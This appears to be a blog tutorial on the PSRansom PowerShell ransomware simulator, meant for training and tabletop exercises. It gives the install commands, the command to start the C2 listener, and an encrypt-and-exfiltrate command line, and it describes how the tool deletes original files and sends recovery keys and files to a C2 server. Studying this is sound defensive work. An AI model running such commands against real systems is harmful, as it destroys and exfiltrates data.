Ransomware Simulation with PowerShell: Psransom
I’m back again this year with a new concept for a project that you can use in your organisation as a table top exercise.This helps cyber security specialists, employees and students to learn how a ransomware can computer.
We are going to simulate a generic ransomware infection using just PowerShell thanks to a simple tool called PSRansom, this tool has been created and designed from scratch by Joel Gámez Molina. We will also be able to use both the Windows and Linux parts, as well as its own C2(command and Control) to demostrate the exfiltration of files.
On the Internet nowadays, there are several sorts of malware, ranging from viruses and Trojans to spyware and ransomware. In our situation, we’ll concentrate on ransomware.
The amount of ransomware operations that occur every day is well known to those of us who are focused to cybersecurity. Ransomware is a type of malware that encrypts files on a device, leaving them and the systems that rely on them unusable. Then, malicious actors demand a ransom in return for decryption.
In no event and under no circumstances should you fall into this trap. Because paying a ransom encourages the perpetrator to profit again from more victims. As a result, having several backups and a robust contingency plan is the best approach.
How can we prepare for such an event? In addition to keeping our operating and antivirus systems up to date, it is critical to be able to determine whether an organization’s security measures are successful against this type of attack.
Of course, there are several methods to create imitation ransomware, both commercially and for free. In my case, I found a free tool on github.
In this specific scenario, the tool may accomplish the following :
- Run all or part of the process in memory
- Simulate file encryption robustly enough
- Delete original files after encryption
- Send recovery key to C2 server
- Exfiltrate encrypted files to C2 server
- Compatibility with both Windows and C2 Linux
- Possibility to recover the original files
let’s see how it works
First and foremost, because this project is fully written in PowerShell, we will need to install it on our Computer if we are not using Windows. Because I’ll be using Kali Linux as my attacker, the installation instructions may not work for you if you use a different distribution.
To begin, we’ll download the project and install PowerShell using the commands below:
sudo apt install powershell -y
git clone https://github.com/JoelGMSec/PSRansom
After downloading the project, we will have two scripts: PSRansom and C2Server. The first will imitate the ransomware attack, while the second will be responsible for recovering the data and their recovery key.
Next, we’ll look at what ransomware has to offer, and then we’ll experiment with command and control. Before we begin, we’ll seek assistance by utilising the parameter -h as follows:
Please note I am going to use windows 10 as the victim and Kali linux as the command and control server.
As seen in the preceding illustration, using the tool is really simple. We simply need to specify the directory to encrypt, the IP or hostname of the C2 server, and the port to which the connection will be received.
If we also want to transfer the encrypted files, we simply add the parameter -x at the end of the command. Finally, if we wish to decrypt, we’ll specify the directory and the recovery key.
To make things easier, we’ll look at some instances below. First, the scenario will be defined as follows:
• The ransomware will run on a Windows machine
• The folder we are going to encrypt is located at C:\Backup
• The C2 server will run on a Kali Linux
Now that we’ve established the simulation environment, we’ll put it to use. The first thing we’ll do is check with Command and control help to see what choices we have:
Open powershell in your Kali linux and use the following command: ./PSRansom.ps1 -h
As we can see, using the command and control server is also extremely simple. We simply need to specify which interface will wait for the connection and which port will receive it. In my situation, I’ll use port 80 and listen on all interfaces with the command:
pwsh C2Server.ps1 + 80
If everything went as planned, we should see something like the prior image. Remember that we’ll need full system privileges to listen on all interfaces.
In my backup folder I have put some random files that we are going to use in this demonstration. Please see image below.
Then, using the following command, we will begin the encryption and exfiltration process:
.\PSRansom.ps1 -e Directory -s C2server -p port -x
To do this, a random key of 24 alphanumeric characters (lowercase, uppercase, and digits) will be produced, the data will be encrypted using AES256, and the recovery key will be delivered to the C2 server.
Once the program is done, the original files will be erased, leaving behind the encrypted files:
If we move to the opposite end, where our C2 server is situated, we should have received something like this:
As seen in the above screenshot, we will obtain the victim’s details, the recovery key, a list of the encrypted files, and the same if we used the parameter to exfiltrate information:
Furthermore, C2 is programmed to do a “payload delivery” via the robots.txt file:
I hope you enjoyed it and found it beneficial in your future exercises.
